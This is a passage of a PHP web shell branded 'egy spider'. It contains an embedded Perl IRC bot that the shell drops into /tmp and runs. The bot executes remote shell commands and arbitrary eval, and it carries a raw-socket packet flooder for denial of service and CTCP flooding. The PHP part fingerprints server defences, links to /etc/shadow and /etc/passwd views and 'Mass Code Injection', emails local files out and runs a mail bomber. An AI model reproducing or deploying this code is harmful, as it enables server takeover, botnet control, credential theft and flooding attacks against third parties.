=~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { + for (my \$cf = 1; \$cf <= $1; \$cf++) { + ctcp(\"$2\", \"$3\"); + } + } + if (\$case =~ /^invite\s+(\S+) (.*)/) { + invite(\"$1\", \"$2\"); + } + if (\$case =~ /^nick (.*)/) { + nick(\"$1\"); + } + if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) { + conectar(\"$2\", \"$1\", 6667); + } + if (\$case =~ /^send\s+(\S+)\s+(\S+)/) { + DCC::SEND(\"$1\", \"$2\"); + } + if (\$case =~ /^raw (.*)/) { + sendraw(\"$1\"); + } + if (\$case =~ /^eval (.*)/) { + eval \"$1\"; + } +} +########################## + + +sub shell { + return unless \$secv; + my \$printl=\$_[0]; + my \$comando=\$_[1]; + if (\$comando =~ /cd (.*)/) { + chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench :D \"); + return; + } + elsif (\$pid = fork) { + waitpid(\$pid, 0); + } else { + if (fork) { + exit; + } else { + my @resp=`\$comando 2>&1 3>&1`; + my \$c=0; + foreach my \$linha (@resp) { + \$c++; + chop \$linha; + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\"); + if (\$c == \"\$linas_max\") { + \$c=0; + sleep \$sleep; + } + } + exit; + } + } +} + + +#eu fiz um pacotadorzinhu e talz.. 
dai colokemo ele aki +sub attacker { + my \$iaddr = inet_aton(\$_[0]); + my \$msg = 'B' x \$_[1]; + my \$ftime = \$_[2]; + my \$cp = 0; + my (%pacotes); + \$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0; + + + socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++; + socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++; + socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++; + socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++; + return(undef) if \$cp == 4; + my \$itime = time; + my (\$cur_time); + while ( 1 ) { + for (my \$porta = 1; \$porta <= 65535; \$porta++) { + \$cur_time = time - \$itime; + last if \$cur_time >= \$ftime; + send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++; + send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++; + send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++; + send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++; + + + # DoS ?? :P + for (my \$pc = 3; \$pc <= 255;\$pc++) { + next if \$pc == 6; + \$cur_time = time - \$itime; + last if \$cur_time >= \$ftime; + socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next; + send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;; + } + } + last if \$cur_time >= \$ftime; + } + return(\$cur_time, %pacotes); +} + + +############# +# ALIASES # +############# + + +sub action { + return unless $#_ == 1; + sendraw(\"PRIVMSG \$_[0] :\\001ACTION \$_[1]\\001\"); +} + + +sub ctcp { + return unless $#_ == 1; + sendraw(\"PRIVMSG \$_[0] :\\001\$_[1]\\001\"); +} +sub msg { + return unless $#_ == 1; + sendraw(\"PRIVMSG \$_[0] :\$_[1]\"); +} + + +sub notice { + return unless $#_ == 1; + sendraw(\"NOTICE \$_[0] :\$_[1]\"); +} + + +sub op { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +o \$_[1]\"); +} +sub deop { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] -o \$_[1]\"); +} +sub hop { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +h \$_[1]\"); +} +sub dehop { + return unless $#_ == 1; + 
sendraw(\"MODE \$_[0] +h \$_[1]\"); +} +sub voice { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +v \$_[1]\"); +} +sub devoice { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] -v \$_[1]\"); +} +sub ban { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +b \$_[1]\"); +} +sub unban { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] -b \$_[1]\"); +} +sub kick { + return unless $#_ == 1; + sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\"); +} + + +sub modo { + return unless $#_ == 0; + sendraw(\"MODE \$_[0] \$_[1]\"); +} +sub mode { modo(@_); } + + +sub j { &join(@_); } +sub join { + return unless $#_ == 0; + sendraw(\"JOIN \$_[0]\"); +} +sub p { part(@_); } +sub part {sendraw(\"PART \$_[0]\");} + + +sub nick { + return unless $#_ == 0; + sendraw(\"NICK \$_[0]\"); +} + + +sub invite { + return unless $#_ == 1; + sendraw(\"INVITE \$_[1] \$_[0]\"); +} +sub topico { + return unless $#_ == 1; + sendraw(\"TOPIC \$_[0] \$_[1]\"); +} +sub topic { topico(@_); } + + +sub whois { + return unless $#_ == 0; + sendraw(\"WHOIS \$_[0]\"); +} +sub who { + return unless $#_ == 0; + sendraw(\"WHO \$_[0]\"); +} +sub names { + return unless $#_ == 0; + sendraw(\"NAMES \$_[0]\"); +} +sub away { + sendraw(\"AWAY \$_[0]\"); +} +sub back { away(); } +sub quit { + sendraw(\"QUIT :\$_[0]\"); +} + + +# DCC +######################### + + +package DCC; + + +sub connections { + my @ready = \$dcc_sel->can_read(1); +# return unless (@ready); + foreach my \$fh (@ready) { + my \$dcctipo = \$DCC{\$fh}{tipo}; + my \$arquivo = \$DCC{\$fh}{arquivo}; + my \$bytes = \$DCC{\$fh}{bytes}; + my \$cur_byte = \$DCC{\$fh}{curbyte}; + my \$nick = \$DCC{\$fh}{nick}; + + + + + my \$msg; + my \$nread = sysread(\$fh, \$msg, 10240); + + + if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) { + \$DCC{\$fh}{status} = \"Cancelado\"; + \$DCC{\$fh}{ftime} = time; + \$dcc_sel->remove(\$fh); + \$fh->close; + next; + } + + + if (\$dcctipo eq \"get\") { + \$DCC{\$fh}{curbyte} += length(\$msg); + + + my \$cur_byte = 
\$DCC{\$fh}{curbyte}; + + + open(FILE, \">> \$arquivo\"); + print FILE \"\$msg\" if (\$cur_byte <= \$bytes); + close(FILE); + + + my \$packbyte = pack(\"N\", \$cur_byte); + print \$fh \"\$packbyte\"; + + + + + if (\$bytes == \$cur_byte) { + \$dcc_sel->remove(\$fh); + \$fh->close; + \$DCC{\$fh}{status} = \"Recebido\"; + \$DCC{\$fh}{ftime} = time; + next; + } + } elsif (\$dcctipo eq \"send\") { + my \$send = \$fh->accept; + \$send->autoflush(1); + \$dcc_sel->add(\$send); + \$dcc_sel->remove(\$fh); + \$DCC{\$send}{tipo} = 'sendcon'; + \$DCC{\$send}{itime} = time; + \$DCC{\$send}{nick} = \$nick; + \$DCC{\$send}{bytes} = \$bytes; + \$DCC{\$send}{curbyte} = 0; + \$DCC{\$send}{arquivo} = \$arquivo; + \$DCC{\$send}{ip} = \$send->peerhost; + \$DCC{\$send}{porta} = \$send->peerport; + \$DCC{\$send}{status} = \"Enviando\"; + #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon + open(FILE, \"< \$arquivo\"); + my \$fbytes; + read(FILE, \$fbytes, 1024); + print \$send \"\$fbytes\"; + close FILE; +# delete(\$DCC{\$fh}); +} elsif (\$dcctipo eq 'sendcon') { + my \$bytes_sended = unpack(\"N\", \$msg); + \$DCC{\$fh}{curbyte} = \$bytes_sended; + if (\$bytes_sended == \$bytes) { + \$fh->close; + \$dcc_sel->remove(\$fh); + \$DCC{\$fh}{status} = \"Enviado\"; + \$DCC{\$fh}{ftime} = time; + next; + } + open(SENDFILE, \"< \$arquivo\"); + seek(SENDFILE, \$bytes_sended, 0); + my \$send_bytes; + read(SENDFILE, \$send_bytes, 1024); + print \$fh \"\$send_bytes\"; + close(SENDFILE); + } + } +} +########################## + + +sub SEND { + my (\$nick, \$arquivo) = @_; + unless (-r \"\$arquivo\") { + return(0); + } + + + my \$dccark = \$arquivo; + \$dccark =~ s/[.*\/](\S+)/$1/; + + + my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'}; + my \$longip = unpack(\"N\",inet_aton(\$meuip)); + + + my @filestat = stat(\$arquivo); + my \$size_total=\$filestat[7]; + if (\$size_total == 0) { + return(0); + } + + + my (\$porta, \$sendsock); + do { + \$porta = int rand(64511); + 
\$porta += 1024; + \$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock); + } until \$sendsock; + + + \$DCC{\$sendsock}{tipo} = 'send'; + \$DCC{\$sendsock}{nick} = \$nick; + \$DCC{\$sendsock}{bytes} = \$size_total; + \$DCC{\$sendsock}{arquivo} = \$arquivo; + + + &::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\"); + + +} + + +sub GET { + my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_; + return(0) if (-e \"\$arquivo\"); + if (open(FILE, \"> \$arquivo\")) { + close FILE; + } else { + return(0); + } + + + my \$dccip=fixaddr(\$dcclongip); + return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1); + my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0); + \$dccsock->autoflush(1); + \$dcc_sel->add(\$dccsock); + \$DCC{\$dccsock}{tipo} = 'get'; + \$DCC{\$dccsock}{itime} = time; + \$DCC{\$dccsock}{nick} = \$nick; + \$DCC{\$dccsock}{bytes} = \$bytes; + \$DCC{\$dccsock}{curbyte} = 0; + \$DCC{\$dccsock}{arquivo} = \$arquivo; + \$DCC{\$dccsock}{ip} = \$dccip; + \$DCC{\$dccsock}{porta} = \$dccporta; + \$DCC{\$dccsock}{status} = \"Recebendo\"; +} +############################ +# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. 
dai o ADM.pl lista os sockets e faz as perguntas +sub Status { + my \$socket = shift; + my \$sock_tipo = \$DCC{\$socket}{tipo}; + unless (lc(\$sock_tipo) eq \"chat\") { + my \$nick = \$DCC{\$socket}{nick}; + my \$arquivo = \$DCC{\$socket}{arquivo}; + my \$itime = \$DCC{\$socket}{itime}; + my \$ftime = time; + my \$status = \$DCC{\$socket}{status}; + \$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime}); + + + my \$d_time = \$ftime-\$itime; + + + my \$cur_byte = \$DCC{\$socket}{curbyte}; + my \$bytes_total = \$DCC{\$socket}{bytes}; + + + my \$rate = 0; + \$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0; + my \$porcen = (\$cur_byte*100)/\$bytes_total; + + + my (\$r_duv, \$p_duv); + if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) { + \$r_duv = $3; \$r_duv++ if $4 >= 5; + \$rate = \"$1\.$2\".\"\$r_duv\"; + } + if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) { + \$p_duv = $3; \$p_duv++ if $4 >= 5; + \$porcen = \"$1\.$2\".\"\$p_duv\"; + } + return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\"); + } + + + return(0); +} + + +# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor) +sub fixaddr { + my (\$address) = @_; + + + chomp \$address; # just in case, sigh. + if (\$address =~ /^\d+$/) { + return inet_ntoa(pack \"N\", \$address); + } elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) { + return \$address; + } elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation! 
+ return inet_ntoa(((gethostbyname(\$address))[4])[0]); + } else { + return; + } +} +############################ +"; +$bot = "/tmp/ircs.pl"; +$open = fopen($bot,"w"); +fputs($open,$file); +fclose($open); +$cmd="perl $bot"; +$cmd2="rm $bot"; +system($cmd); +system($cmd2); +$_POST['cmd']="echo \"Now script try connect to ircserver ...\""; + + +} + + + + +if(!isset($_COOKIE[$lang[$language.'_text137']])) { + $ust_u=''; + if($unix && !$safe_mode){ + foreach ($userful as $item) { + if(which($item)){$ust_u.=$item;} + } + } + if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";} + if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";} + if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";} + if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";} + if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";} + if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";} + if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";} + if(substr($ust_u,0,1)==",") {$ust_u[0]="";} + + $ust_u = trim($ust_u); +}else { + $ust_u = trim($_COOKIE[$lang[$language.'_text137']]); +} + + +if(!isset($_COOKIE[$lang[$language.'_text138']])) { + $ust_d=''; + if($unix && !$safe_mode){ + foreach ($danger as $item) { + if(which($item)){$ust_d.=$item;} + } + } + if(!$safe_mode){ + foreach ($danger as $item) { + if(ps($item)){$ust_d.=$item;} + } + } + if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust_d.=", mod_security";} + if(substr($ust_d,0,1)==",") {$ust_d[0]="";} + + $ust_d = trim($ust_d); +}else { + $ust_d = trim($_COOKIE[$lang[$language.'_text138']]); +} + + +if(!isset($_COOKIE[$lang[$language.'_text142']])) { + + + $select_downloaders='<select size="1" name=with>'; + if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= 
"<option value=\"fopen\">fopen</option>";$downloader="fopen";} + if($unix && !$safe_mode){ + foreach ($downloaders as $item) { + if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";} + } + } + $select_downloaders .= '</select>'; + if(substr($downloader,0,1)==",") {$downloader[0]="";} + + $downloader=trim($downloader); + + +} + + + + +echo $head; +echo '</head>'; + + +echo '<<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#dadada><tr><td bgcolor=#000000 width=120><font face=Comic Sans MS size=1>'.ws(2).'<DIV dir=ltr align=center><p><font style="font-weight: 500" face="Webdings" color="#800000" size="7">!</font></p>'.ws(2).'<DIV dir=ltr align=center><SPAN +style="FILTER: blur(add=1,direction=10,strength=25); HEIGHT: 25px"> +<SPAN +style="FONT-SIZE: 15pt; COLOR: white; FONT-FAMILY: Impact">egy spider</P></SPAN></DIV></font></b></font></td><td bgcolor=#000000><font face=tahoma size=1>'. + + +'</center></font>'.$fe.'</td>'.'<td bgcolor=#333333><font face=#FFFFFF size=-2>'; +echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]"; +echo " X_FORWARDED_FOR:"; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){echo "[<font color=red>".$_SERVER['HTTP_X_FORWARDED_FOR']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";} +echo " CLIENT_IP: ";if(isset($_SERVER['HTTP_CLIENT_IP'])){echo "[<font color=red>".$_SERVER['HTTP_CLIENT_IP']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";} +echo " Server IP: [<font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]"; + + +echo "<br>"; + + +echo ws(2)."PHP Version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: <b>".(($curl_on)?("<font color=red>ON</font>"):("<font color=green>OFF</font>")); +echo "</b>".ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font 
color=red>ON</font>"; } else { echo "<font color=green>OFF</font>"; } +echo "</b>".ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "MySQLi: <b>"; +$mysqli_on = @function_exists('mysqli_connect'); +if($mysqli_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "MSQL: <b>"; +$msql_on = @function_exists('msql_connect'); +if($msql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "SQLite: <b>"; +$sqlite_on = @function_exists('sqlite_open'); +if($sqlite_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b><br>".ws(2); + + +echo "Safe_Mode: <b>"; +echo (($safe_mode)?("<font color=red>ON</font>"):("<font color=green>OFF</font>")); +echo "</b>".ws(2); +echo "Open_Basedir: <b>"; +if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=red>$df</font></b>";};} +else {echo "<font color=green>NONE</font></b>";} +echo ws(2)."Safe_Exec_Dir: <b>"; +if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} +echo ws(2)."Safe_Gid: <b>"; +if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=green>ON</font></b>";}else {echo "<font color=red>OFF</font></b>";};} +else {echo 
"<font color=red>ini_get disable!</font></b>";} +echo ws(2)."Safe_Include_Dir: <b>"; +if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} +echo ws(2)."Sql.safe_mode: <b>"; +if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=green>OFF</font></b>";};} +else {echo "<font color=red>ini_get disable!</font></b>";} + + +echo "<br>".ws(2); +echo "Disable Functions : <b>";$df='ini_get disable!'; +if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} + + +if(@function_exists('diskfreespace')){$free = @diskfreespace($dir);} +elseif(@function_exists('disk_free_space')){$free = @disk_free_space($dir);}else{$free = 'Unknown';} +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +echo "<br>".ws(2)."Free Space : <b>".view_size($free)."</b> Total Space: <b>".view_size($all)."</b>"; + + + + +if($ust_u){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust_u."</font>";}; + + +if($ust_d){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>".$ust_d."</font>";}; + + +if($downloader){echo "<br>".ws(2).$lang[$language.'_text142'].": <font color=blue>".$downloader."</font>";}; + + + + +echo "<br>".ws(2)."</b>"; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?' title=\"".$lang[$language.'_text160']."\"><b>Home</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?egy' title=\"".$lang[$language.'_text159']."\"><b>About EgY SpIdEr</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?news' title=\"".$lang[$language.'_text152']."\"><b>News</b></a> ".$rb; +echo ws(2).$lb." 
<a href='".$_SERVER['PHP_SELF']."?logout=1' title=\"".$lang[$language.'_text153']."\"><b>Logout</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=feedback' title=\"".$lang[$language.'_text180']."\"><b>Feedback & Contact Me </b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=qindx' title=\"".$lang[$language.'_text154']."\"><b>Quick index </b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=massbrowsersploit' title=\"".$lang[$language.'_text155']."\"><b>Mass Code Injection</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=showsrc' title=\"".$lang[$language.'_text156']."\"><b>File source </b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=zone' title=\"".$lang[$language.'_text157']."\"><b>Zone-h</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=encoder' title=\"".$lang[$language.'_text158']."\"><b>Hash Tools</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?1' title=\"".$lang[$language.'_text46']."\"><b>PhpInfo</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?2' title=\"".$lang[$language.'_text47']."\"><b>Php.Ini</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?3' title=\"".$lang[$language.'_text50']."\"><b>Cpu</b></a> ".$rb; +if(!$unix) { + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?5' title=\"".$lang[$language.'_text50']."\"><b>SystemInfo</b></a> ".$rb; +}else{ + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?6' title=\"View syslog.conf\"><b>Syslog</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?7' title=\"View resolv\"><b>Resolv</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?8' title=\"View hosts\"><b>Hosts</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?9' title=\"View shadow\"><b>Shadow</b></a> ".$rb; + echo ws(2).$lb." 
<a href='".$_SERVER['PHP_SELF']."?10' title=\"".$lang[$language.'_text95']."\"><b>Passwd</b></a> ".$rb; +} +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?11' title=\"".$lang[$language.'_text48']."\"><b>Tmp</b></a> ".$rb; +echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?12' title=\"".$lang[$language.'_text49']."\"><b>Delete</b></a> ".$rb; + + +if($unix && !$safe_mode) +{ + echo "<br>".ws(2)."</b>"; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?13' title=\"View procinfo\"><b>Procinfo</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?14' title=\"View proc version\"><b>Version</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?15' title=\"View mem free\"><b>Free</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?16' title=\"View dmesg\"><b>Dmesg</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?17' title=\"View vmstat\"><b>Vmstat</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?18' title=\"View lspci\"><b>lspci</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?19' title=\"View lsdev\"><b>lsdev</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?20' title=\"View interrupts\"><b>Interrupts</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?21' title=\"View realise1\"><b>Realise1</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?22' title=\"View realise2\"><b>Realise2</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?23' title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb; + + + echo "<br>".ws(2)."</b>"; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?24' title=\"View w\"><b>W</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?25' title=\"View who\"><b>Who</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?26' title=\"View uptime\"><b>Uptime</b></a> ".$rb; + echo ws(2).$lb." 
<a href='".$_SERVER['PHP_SELF']."?27' title=\"View last -n 10\"><b>Last</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?28' title=\"View ps -aux\"><b>Ps Aux</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?29' title=\"View service\"><b>Service</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?30' title=\"View ifconfig\"><b>Ifconfig</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?31' title=\"View netstat -a\"><b>Netstat</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?32' title=\"View fstab\"><b>Fstab</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?33' title=\"View fdisk -l\"><b>Fdisk</b></a> ".$rb; + echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?34' title=\"View df -h\"><b>df -h</b></a> ".$rb; +} + + +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; + + +if($unix){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +if(!empty($id)) { echo ws(3).$id."<br>"; } +else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid')) + { + $euserinfo = @posix_getpwuid(@posix_geteuid()); + $egroupinfo = @posix_getgrgid(@posix_getegid()); + echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>'; + } +else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." 
gid=".@getmygid()."<br>"; +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@getenv("USERNAME")."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; + + + + +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n"); + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if($file=moreread($_POST['loc_file'])){ $filedump = $file; } + else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; } + if(!empty($_POST['cmd'])) + { + $filename = @basename($_POST['loc_file']); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from egy spider shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'egy_spider@hotmail.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + err(6+$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size'])) + { + for($h=1;$h<=$_POST['mail_flood'];$h++){ + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n"); + } + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' 
